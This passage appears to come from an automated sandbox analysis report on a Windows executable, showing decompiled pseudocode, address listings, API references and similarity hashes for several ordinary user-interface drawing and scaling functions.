                                                                                • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046552B), ref: 00402943
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046552B), ref: 00402954
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID: :
                                                                                • API String ID: 1611563598-336475711
                                                                                • Opcode ID: 1e77bd41e5d169101baf55dc96c7ba769223cc0188d789e3d9a54370b625b564
                                                                                • Instruction ID: e280489c4e77a9dbbac942a73009b5f8a6c13a22013b3f11ed9b453d4861a154
                                                                                • Opcode Fuzzy Hash: 1e77bd41e5d169101baf55dc96c7ba769223cc0188d789e3d9a54370b625b564
                                                                                • Instruction Fuzzy Hash: 9FF096763446C05AE310E6688852BDB72DC8B55344F04442EBBC8D73C2E6B8994857A7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045BDF8, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0045BDF8(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				char _v16;
				signed int _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				struct tagRECT _v65;
				void* __edi;
				void* __ebp;
				intOrPtr _t138;
				intOrPtr _t148;
				signed int _t163;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t188;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr* _t240;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr _t256;
				signed int _t257;
				void* _t265;

				_v12 = __ecx;
				_v8 = __eax;
				_t240 = _a24 + 0xfffffffc;
				_v16 = __edx;
				_v49.top = _a20;
				while(1) {
					_t138 = _v49.top;
					if(_t138 >= _a12) {
						break;
					}
					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
					if(_t138 > _v16) {
						_t257 = _v8;
						_v49.left = _v12;
						_v49.bottom = E0045F800( *_t240, _v16) + _v49.top;
						while(1) {
							__eflags = _v49.left - _a16;
							if(_v49.left >= _a16) {
								break;
							}
							_t148 =  *_t240;
							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
								_v49.right = E0045F7E0( *_t240, _t257) + _v49.left;
								__eflags = _v49.right - _v49.left;
								if(_v49.right <= _v49.left) {
									L39:
									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
									_t257 = _t257 + 1;
									__eflags = _t257;
									continue;
								}
								__eflags = RectVisible(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
								if(__eflags == 0) {
									goto L39;
								} else {
									_v17 = _a4;
									_t163 = E0045B628( *_t240, __eflags);
									__eflags = _t163;
									if(_t163 != 0) {
										_t236 =  *_t240;
										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
											_t238 =  *_t240;
											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
												_t24 =  &_v17;
												 *_t24 = _v17 | 0x00000002;
												__eflags =  *_t24;
											}
										}
									}
									_t242 = _a24 - 0x80;
									_t166 = E0045A35C(_t257, _a24 - 0x80, _v16);
									__eflags = _t166;
									if(_t166 != 0) {
										_t29 =  &_v17;
										 *_t29 = _v17 | 0x00000001;
										__eflags =  *_t29;
									}
									__eflags = _v17 & 0x00000002;
									if((_v17 & 0x00000002) == 0) {
										L14:
										_t167 =  *_t240;
										__eflags =  *((char*)(_t167 + 0x28c));
										if( *((char*)(_t167 + 0x28c)) != 0) {
											L16:
											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
											E0041FCC0( *((intOrPtr*)( *_t240 + 0x208)));
											__eflags = _v17 & 0x00000001;
											if(__eflags == 0) {
												L20:
												E0041F338( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
												L21:
												E0041F9D0(_t260,  &_v49);
												L22:
												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
												_t180 =  *_t240;
												__eflags =  *((char*)(_t180 + 0x28c));
												if( *((char*)(_t180 + 0x28c)) != 0) {
													__eflags = _v17 & 0x00000004;
													if((_v17 & 0x00000004) != 0) {
														_t201 =  *_t240;
														__eflags =  *((char*)(_t201 + 0x1a5));
														if( *((char*)(_t201 + 0x1a5)) != 0) {
															_t202 = _a24;
															_t253 = _a24;
															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t257 = _t257;
																_t205 = _a24;
																__eflags =  *(_t205 - 0x84) & 0x00000004;
																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
																	_t206 = _a24;
																	__eflags =  *(_t206 - 0x84) & 0x00000008;
																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
																		_t88 =  &(_v65.bottom);
																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
																		__eflags =  *_t88;
																	}
																} else {
																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
																}
																DrawEdge(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
																DrawEdge(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
															}
														}
													}
												}
												_t181 =  *_t240;
												__eflags =  *((char*)(_t181 + 0x28c));
												if( *((char*)(_t181 + 0x28c)) != 0) {
													_t182 =  *_t240;
													__eflags =  *(_t182 + 0x1c) & 0x00000010;
													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
														__eflags = _v17 & 0x00000002;
														if((_v17 & 0x00000002) != 0) {
															_t183 =  *_t240;
															_t252 =  *0x45c12c; // 0x2400
															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45c12c);
															if(_t252 != ( *(_t183 + 0x248) &  *0x45c12c)) {
																__eflags =  *( *_t240 + 0x249) & 0x00000010;
																if(__eflags == 0) {
																	_t188 = E004037B0( *_t240, __eflags);
																	__eflags = _t188;
																	if(_t188 != 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		_t257 = _t257;
																		_v33.left = _v49.right;
																		_v33.right = _v49.left;
																		DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
																	} else {
																		DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
																	}
																}
															}
														}
													}
												}
												goto L39;
											}
											__eflags = _v17 & 0x00000002;
											if(__eflags == 0) {
												L19:
												E0041F338( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
												E0041EB4C( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
												goto L21;
											}
											_t256 =  *0x45c128; // 0x0
											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45c124);
											if(__eflags == 0) {
												goto L20;
											}
											goto L19;
										}
										_t232 =  *_t240;
										__eflags =  *(_t232 + 0x1c) & 0x00000010;
										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
											goto L22;
										}
										goto L16;
									}
									_t233 =  *_t240;
									__eflags =  *(_t233 + 0x249) & 0x00000004;
									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
										goto L14;
									}
									_t234 =  *_t240;
									__eflags =  *((char*)(_t234 + 0x28d));
									if( *((char*)(_t234 + 0x28d)) == 0) {
										goto L14;
									}
									_t235 =  *_t240;
									__eflags =  *(_t235 + 0x1c) & 0x00000010;
									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
										goto L39;
									}
									goto L14;
								}
							}
							break;
						}
						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
						_t130 =  &_v16;
						 *_t130 = _v16 + 1;
						__eflags =  *_t130;
						continue;
					}
					break;
				}
				return _t138;
			}






































                                                                                0x0045be01
                                                                                0x0045be04
                                                                                0x0045be0a
                                                                                0x0045be0d
                                                                                0x0045be13
                                                                                0x0045c101
                                                                                0x0045c101
                                                                                0x0045c107
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045c10b
                                                                                0x0045c114
                                                                                0x0045be1b
                                                                                0x0045be21
                                                                                0x0045be31
                                                                                0x0045c0dc
                                                                                0x0045c0df
                                                                                0x0045c0e2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045c0e4
                                                                                0x0045c0e6
                                                                                0x0045c0ec
                                                                                0x0045be45
                                                                                0x0045be4b
                                                                                0x0045be4e
                                                                                0x0045c0cf
                                                                                0x0045c0d8
                                                                                0x0045c0db
                                                                                0x0045c0db
                                                                                0x00000000
                                                                                0x0045c0db
                                                                                0x0045be6b
                                                                                0x0045be6d
                                                                                0x00000000
                                                                                0x0045be73
                                                                                0x0045be76
                                                                                0x0045be7b
                                                                                0x0045be80
                                                                                0x0045be82
                                                                                0x0045be84
                                                                                0x0045be8c
                                                                                0x0045be8f
                                                                                0x0045be91
                                                                                0x0045be93
                                                                                0x0045be99
                                                                                0x0045be9b
                                                                                0x0045be9b
                                                                                0x0045be9b
                                                                                0x0045be9b
                                                                                0x0045be99
                                                                                0x0045be8f
                                                                                0x0045bea2
                                                                                0x0045beaa
                                                                                0x0045beaf
                                                                                0x0045beb1
                                                                                0x0045beb3
                                                                                0x0045beb3
                                                                                0x0045beb3
                                                                                0x0045beb3
                                                                                0x0045beb7
                                                                                0x0045bebb
                                                                                0x0045bedf
                                                                                0x0045bedf
                                                                                0x0045bee1
                                                                                0x0045bee8
                                                                                0x0045bef2
                                                                                0x0045bef4
                                                                                0x0045bf01
                                                                                0x0045bf06
                                                                                0x0045bf0a
                                                                                0x0045bf4a
                                                                                0x0045bf50
                                                                                0x0045bf55
                                                                                0x0045bf5a
                                                                                0x0045bf5f
                                                                                0x0045bf70
                                                                                0x0045bf76
                                                                                0x0045bf78
                                                                                0x0045bf7f
                                                                                0x0045bf85
                                                                                0x0045bf89
                                                                                0x0045bf8f
                                                                                0x0045bf91
                                                                                0x0045bf98
                                                                                0x0045bf9e
                                                                                0x0045bfa7
                                                                                0x0045bfaa
                                                                                0x0045bfb0
                                                                                0x0045bfb9
                                                                                0x0045bfba
                                                                                0x0045bfbb
                                                                                0x0045bfbc
                                                                                0x0045bfbd
                                                                                0x0045bfbe
                                                                                0x0045bfc1
                                                                                0x0045bfc8
                                                                                0x0045bfd5
                                                                                0x0045bfd8
                                                                                0x0045bfdf
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfca
                                                                                0x0045bfd0
                                                                                0x0045bfd0
                                                                                0x0045c008
                                                                                0x0045c02b
                                                                                0x0045c02b
                                                                                0x0045bfb0
                                                                                0x0045bf98
                                                                                0x0045bf89
                                                                                0x0045c030
                                                                                0x0045c032
                                                                                0x0045c039
                                                                                0x0045c03f
                                                                                0x0045c041
                                                                                0x0045c045
                                                                                0x0045c04b
                                                                                0x0045c04f
                                                                                0x0045c051
                                                                                0x0045c061
                                                                                0x0045c068
                                                                                0x0045c06b
                                                                                0x0045c06f
                                                                                0x0045c076
                                                                                0x0045c07e
                                                                                0x0045c083
                                                                                0x0045c085
                                                                                0x0045c0a7
                                                                                0x0045c0a8
                                                                                0x0045c0a9
                                                                                0x0045c0aa
                                                                                0x0045c0ab
                                                                                0x0045c0af
                                                                                0x0045c0b5
                                                                                0x0045c0ca
                                                                                0x0045c087
                                                                                0x0045c099
                                                                                0x0045c099
                                                                                0x0045c085
                                                                                0x0045c076
                                                                                0x0045c06b
                                                                                0x0045c04f
                                                                                0x0045c045
                                                                                0x00000000
                                                                                0x0045c039
                                                                                0x0045bf0c
                                                                                0x0045bf10
                                                                                0x0045bf2e
                                                                                0x0045bf36
                                                                                0x0045bf43
                                                                                0x00000000
                                                                                0x0045bf43
                                                                                0x0045bf22
                                                                                0x0045bf29
                                                                                0x0045bf2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bf2c
                                                                                0x0045beea
                                                                                0x0045beec
                                                                                0x0045bef0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bef0
                                                                                0x0045bebd
                                                                                0x0045bebf
                                                                                0x0045bec6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bec8
                                                                                0x0045beca
                                                                                0x0045bed1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bed3
                                                                                0x0045bed5
                                                                                0x0045bed9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bed9
                                                                                0x0045be6d
                                                                                0x00000000
                                                                                0x0045c0ec
                                                                                0x0045c0fb
                                                                                0x0045c0fe
                                                                                0x0045c0fe
                                                                                0x0045c0fe
                                                                                0x00000000
                                                                                0x0045c0fe
                                                                                0x00000000
                                                                                0x0045c114
                                                                                0x0045c120

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cece8a76ed6c42ea098dfc4e10f05c1ef134cf81c6061f06068430d5f36978dc
                                                                                • Instruction ID: 837a3775693fb1747dfe6eea28fc7c014706e51f64b2177a40ed002ee77a759f
                                                                                • Opcode Fuzzy Hash: cece8a76ed6c42ea098dfc4e10f05c1ef134cf81c6061f06068430d5f36978dc
                                                                                • Instruction Fuzzy Hash: 2AB11B75A006189FDB10DF58C485BEEB7F5EF09305F1440A6ED44AB3A2C778AC4ACB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044E634, Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E0044E634(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_v8 = __eax;
				E00438704(_v8);
				_push(_t203);
				_push(0x44e88a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x487709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00437E74(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E004350BC(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E00435100(_v8, _t100, _t214);
					}
					_t180 =  *0x44e898; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E0044DB9C(_v8, 1, 1);
						E0043B818(_v8, 1, 1, _t215);
					}
					E00436848(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x44e891);
					return E0043870C(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x487c00; // 0x2290f1c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x487c00; // 0x2290f1c
							E0041ED34( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041ED2C( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x487c00; // 0x2290f1c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E0044E9BC(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E0044DB9C(_v8, _t122, _t199);
						E0043B818(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                                                0x0044e634
                                                                                0x0044e635
                                                                                0x0044e63c
                                                                                0x0044e642
                                                                                0x0044e649
                                                                                0x0044e64a
                                                                                0x0044e64f
                                                                                0x0044e652
                                                                                0x0044e65a
                                                                                0x0044e665
                                                                                0x0044e670
                                                                                0x0044e676
                                                                                0x0044e678
                                                                                0x0044e682
                                                                                0x0044e68d
                                                                                0x0044e69c
                                                                                0x0044e7fe
                                                                                0x0044e801
                                                                                0x0044e807
                                                                                0x0044e809
                                                                                0x0044e810
                                                                                0x0044e810
                                                                                0x0044e818
                                                                                0x0044e81e
                                                                                0x0044e820
                                                                                0x0044e827
                                                                                0x0044e827
                                                                                0x0044e82f
                                                                                0x0044e835
                                                                                0x0044e83b
                                                                                0x0044e83d
                                                                                0x0044e84c
                                                                                0x0044e85e
                                                                                0x0044e85e
                                                                                0x0044e86f
                                                                                0x0044e876
                                                                                0x0044e879
                                                                                0x0044e87c
                                                                                0x0044e889
                                                                                0x0044e6b2
                                                                                0x0044e6bc
                                                                                0x0044e6c7
                                                                                0x0044e6d0
                                                                                0x0044e6dc
                                                                                0x0044e6fc
                                                                                0x0044e6fc
                                                                                0x0044e6d0
                                                                                0x0044e701
                                                                                0x0044e70c
                                                                                0x0044e71a
                                                                                0x0044e71f
                                                                                0x0044e725
                                                                                0x0044e727
                                                                                0x0044e72d
                                                                                0x0044e736
                                                                                0x0044e749
                                                                                0x0044e758
                                                                                0x0044e777
                                                                                0x0044e777
                                                                                0x0044e787
                                                                                0x0044e7a6
                                                                                0x0044e7a6
                                                                                0x0044e7b6
                                                                                0x0044e7d5
                                                                                0x0044e7f8
                                                                                0x0044e7f8
                                                                                0x0044e7b6
                                                                                0x00000000
                                                                                0x0044e727

                                                                                APIs
                                                                                • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E6F3
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E76F
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E79E
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7CD
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 179e502b649ba4b6491df2e8353e2539bc661f28efba15cfb078de0c6466ef6c
                                                                                • Instruction ID: 4bc58ff00013c07b577bdc672f5bb2155b15ba06c25ac9d37719f0d5c6b72ce6
                                                                                • Opcode Fuzzy Hash: 179e502b649ba4b6491df2e8353e2539bc661f28efba15cfb078de0c6466ef6c
                                                                                • Instruction Fuzzy Hash: 8371C474A04104EFDB04EBA9C589AADB7F5BF49304F2541F9E808EB362C739AE41DB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004459FC, Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E004459FC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x445be0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E00447860(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E00448E9C(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004043B8( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E0040471C(_v16, 0x445c04);
					if(_t153 != 0) {
						E0041F454( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041EE0C( *((intOrPtr*)(_v8 + 0xc))) |  *0x445c08;
							E0041EE18( *((intOrPtr*)(_v8 + 0xc)), E0041EE0C( *((intOrPtr*)(_v8 + 0xc))) |  *0x445c08, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E004045D8(_v16);
							_t65 = E004047D0(_v16);
							DrawTextA(E0041FDC4(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x445be7);
							return E00404320( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
								_t89 = E004045D8(_v16);
								_t91 = E004047D0(_v16);
								DrawTextA(E0041FDC4(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
							} else {
								_t76 = E0041E68C(0x8000000d);
								_t78 = E0041E68C(0x80000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E0041FDC4(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E004045E0( &_v16, 0x445bf8);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                                                0x004459fc
                                                                                0x004459fd
                                                                                0x00445a07
                                                                                0x00445a0a
                                                                                0x00445a0d
                                                                                0x00445a10
                                                                                0x00445a12
                                                                                0x00445a17
                                                                                0x00445a18
                                                                                0x00445a1d
                                                                                0x00445a20
                                                                                0x00445a25
                                                                                0x00445a2a
                                                                                0x00445a2e
                                                                                0x00445a3e
                                                                                0x00445a4d
                                                                                0x00445a50
                                                                                0x00445a55
                                                                                0x00445a55
                                                                                0x00445a55
                                                                                0x00445a40
                                                                                0x00445a43
                                                                                0x00445a43
                                                                                0x00445a58
                                                                                0x00445a58
                                                                                0x00445a64
                                                                                0x00445a6c
                                                                                0x00445a92
                                                                                0x00445a9a
                                                                                0x00445a9f
                                                                                0x00445add
                                                                                0x00445ae2
                                                                                0x00445ae6
                                                                                0x00445aeb
                                                                                0x00445af7
                                                                                0x00445aff
                                                                                0x00445aff
                                                                                0x00445b04
                                                                                0x00445b08
                                                                                0x00445ba5
                                                                                0x00445bad
                                                                                0x00445bb6
                                                                                0x00445bc5
                                                                                0x00445bca
                                                                                0x00445bcc
                                                                                0x00445bcf
                                                                                0x00445bd2
                                                                                0x00445bdf
                                                                                0x00445b0e
                                                                                0x00445b0e
                                                                                0x00445b12
                                                                                0x00445b1c
                                                                                0x00445b2c
                                                                                0x00445b39
                                                                                0x00445b42
                                                                                0x00445b51
                                                                                0x00445b5e
                                                                                0x00445b5e
                                                                                0x00445b63
                                                                                0x00445b67
                                                                                0x00445b95
                                                                                0x00445ba0
                                                                                0x00445b69
                                                                                0x00445b6e
                                                                                0x00445b7a
                                                                                0x00445b7f
                                                                                0x00445b81
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00445b8e
                                                                                0x00445b8e
                                                                                0x00000000
                                                                                0x00445b67
                                                                                0x00445b08
                                                                                0x00445aa4
                                                                                0x00445ab2
                                                                                0x00445ab3
                                                                                0x00445ab4
                                                                                0x00445ab5
                                                                                0x00445ab6
                                                                                0x00445acb
                                                                                0x00445acb
                                                                                0x00000000
                                                                                0x00445a6e
                                                                                0x00445a72
                                                                                0x00445a85
                                                                                0x00445a8d
                                                                                0x00000000
                                                                                0x00445a8d
                                                                                0x00445a7a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00445a7f
                                                                                0x00445a83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00445a83

                                                                                APIs
                                                                                • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00445ACB
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00445B1C
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445B51
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 00445B5E
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445BC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
